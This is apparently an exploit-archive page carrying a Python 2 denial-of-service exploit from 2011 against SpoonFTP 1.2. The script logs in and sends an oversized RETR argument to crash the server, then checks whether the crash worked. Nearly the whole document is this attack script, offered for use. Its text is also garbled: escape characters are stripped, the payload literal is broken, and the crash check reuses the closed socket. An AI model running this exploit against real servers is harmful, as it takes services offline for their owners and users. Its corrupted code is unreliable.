SpoonFTP 1.2 RETR Denial of Service Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : SpoonFTP 1.2 RETR Denial of Service Vulnerability
# Published : 2011-03-21
# Author : C4SS!0 G0M3S
# Previous Title : Iconics GENESIS32 and GENESIS64 Multiple Vulnerabilities
# Next Title : Novell Netware NWFTPD.NLM DELE Remote Code Execution Vulnerability
#!/usr/bin/python
#
#
#[+]Exploit Title: Exploit Denial of Service SpoonFTP 1.2
#[+]Date: 2132011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.softpedia.com/progDownload/SpoonFTP-Download-49969.html
#[+]Version: 1.2
#[+]Tested On: WIN-XP SP3 Portuguese Brazil
#[+]CVE: N/A
#
#
#       xxx     xxx        xxxxxxxxxxx        xxxxxxxxxxx        xxxxxxxxxxx
#        xxx   xxx        xxxxxxxxxxxxx      xxxxxxxxxxxxx      xxxxxxxxxxxxx 
#         xxx xxx         xxxxxxxxxxxxx      xxxxxxxxxxxxx      xxxxxxxxxxxxx                   
#          xxxxx          xxx       xxx      xxx       xxx      xxx       xxx           xxxxxx  
#           xxx           xxx       xxx      xxx       xxx      xxx       xxx          xxxxxxxx  xxxxxxxx  xxxxxxxxx
#         xxxxxx          xxx       xxx      xxx       xxx      xxx       xxx          xx    xx  xx    xx  xx
#        xxx  xxx         xxx       xxx      xxx       xxx      xxx       xxx          xx    xx  xx xxxx   xx  xxxxx
#      xxx     xxx        xxxxxxxxxxxxx      xxxxxxxxxxxxx      xxxxxxxxxxxxx   xxx    xxxxxxxx  xx   xx   xx     xx
#     xxx       xxx        xxxxxxxxxxx        xxxxxxxxxxx        xxxxxxxxxxx    xxx     xxxxxx   xx    xx  xxxxxxxxx
#
#Criado por C4SS!0 G0M3S
#E-mail Louredo_@hotmail.com
#Site www.exploit-br.org
#
#



from socket import *
import os
import sys
from time import sleep

if os.name == 'nt':
     os.system("cls")
     os.system("color 4f")
else:
     os.system("clear")

	 
def usage():
     print """
	 
          ===================================================
          ===================================================
          ==========Exploit Denial of Service SpoonFTP=======
          ==========Autor C4SS!0 G0M3S=======================
          ==========E-mail Louredo_@hotmail.com==============
          ==========Site www.exploit-br.org==================
          ===================================================
          ===================================================

"""

if len(sys.argv) !=5:
     usage()
     print "tt[-]Usage: %s <Host> <Port> <User> <Pass>" % sys.argv[0]
     print "tt[-]Exemple: %s 192.168.1.2 21 admin pass" % sys.argv[0]
     sys.exit(0)

host = sys.argv[1]
porta = int(sys.argv[2])
user = sys.argv[3]
pasw = sys.argv[4]

exploit = "/\" * (6000/3)
usage()
print "tt[+]Connecting to Server "+host+"...n"
sleep(1)
s = socket(AF_INET,SOCK_STREAM)
try:
     s.connect((host,porta))
     print "tt[+]Checking if server is vulnerablen"
     sleep(1)
     banner = s.recv(2000)
     if banner.find("SpoonFTP V1.2") == -1:
          print "tt[+]I'm sorry, server is not vulnerable:(n"
          sleep(1)
          sys.exit(0x00)
     print "tt[+]Making Loging On Servern"
     sleep(1)
     s.send("USER "+user+"rn")
     s.recv(200)
     s.send("PASS "+pasw+"rn")
     check = s.recv(2000)
     if check.find("230") == -1:
          print "tt[+]Error on Login, Check Your Username or Passwordn"
          sleep(1)
          sys.exit(0)
     print "tt[+]Sending Exploit...n"
     sleep(1)
     s.send("RETR "+exploit+"rn")
     s.close()
     print "tt[+]Submitted Exploit Successn"
     sleep(1)

     print "tt[+]Checking if the exploit worksn"
     sleep(1)
     try:
          so = socket(AF_INET,SOCK_STREAM)
          s.connect((host,porta))
          print "tt[+]I'm Sorry, But Not Worked Exploit:(n"
	  sleep(1)
     except:
          print "tt[+]Congratulations, worked with the Exploit Success:)n"
	  sleep(1)
     
     
except:
     print "tt[+]Error connecting to Servern"
     sleep(1)